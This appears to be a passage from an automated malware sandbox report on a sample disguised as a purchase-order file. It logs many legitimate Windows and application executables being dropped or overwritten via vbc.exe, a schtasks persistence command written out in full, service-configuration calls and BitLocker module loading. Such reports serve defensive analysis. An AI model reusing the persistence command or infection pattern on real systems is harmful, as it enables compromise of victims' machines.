                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Windows\System32\TieringEngineService.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files\Mozilla Firefox\firefox.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files\Mozilla Firefox\updater.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.ShowHelp.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files\7-Zip\Uninstall.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Windows\System32\FXSSVC.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.134\elevation_service.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to dropped file
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeFile created: C:\Windows\System32\sppsvc.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Windows\System32\SensorDataService.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXEJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Windows\System32\msdtc.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Windows\System32\wbem\WmiApSrv.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Windows\System32\alg.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files\7-Zip\7zFM.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\Google\Update\Install\{6BB58CDD-A64E-41C8-8D92-79A516D3D118}\117.0.5938.134_117.0.5938.132_chrome_updater.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.134\notification_helper.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Windows\System32\VSSVC.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Windows\System32\wbengine.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Windows\System32\SearchIndexer.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXEJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\excelcnv.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exeJump to dropped file
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeFile created: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.134\chrome_pwa_launcher.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Windows\System32\AgentService.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files\Google\Chrome\Application\chrome_proxy.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Windows\System32\OpenSSH\ssh-agent.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Windows\System32\snmptrap.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Windows\System32\Spectrum.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Windows\System32\Locator.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Windows\System32\AgentService.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Windows\System32\VSSVC.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Windows\System32\wbengine.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Windows\System32\wbem\WmiApSrv.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Windows\System32\SearchIndexer.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Windows\System32\AppVClient.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Windows\System32\FXSSVC.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Windows\System32\TieringEngineService.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Windows\System32\vds.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Windows\System32\OpenSSH\ssh-agent.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Windows\System32\alg.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Windows\SysWOW64\perfhost.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Windows\System32\msiexec.exeJump to dropped file
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeFile created: C:\Windows\System32\sppsvc.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Windows\System32\SensorDataService.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Windows\System32\msdtc.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeJump to dropped file

                  Boot Survival

                  barindex
                  Uses schtasks.exe or at.exe to add and modify task schedules
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YRtQgzFlDnVSru" /XML "C:\Users\user\AppData\Local\Temp\tmpE707.tmp"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 9_2_00F6CBD0 StrStrIW,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,StartServiceW,9_2_00F6CBD0

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Creates files inside the volume driver (system volume information)
                  Source: C:\Windows\System32\TieringEngineService.exeFile created: C:\System Volume Information\Heat\
                  Loading BitLocker PowerShell Module
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
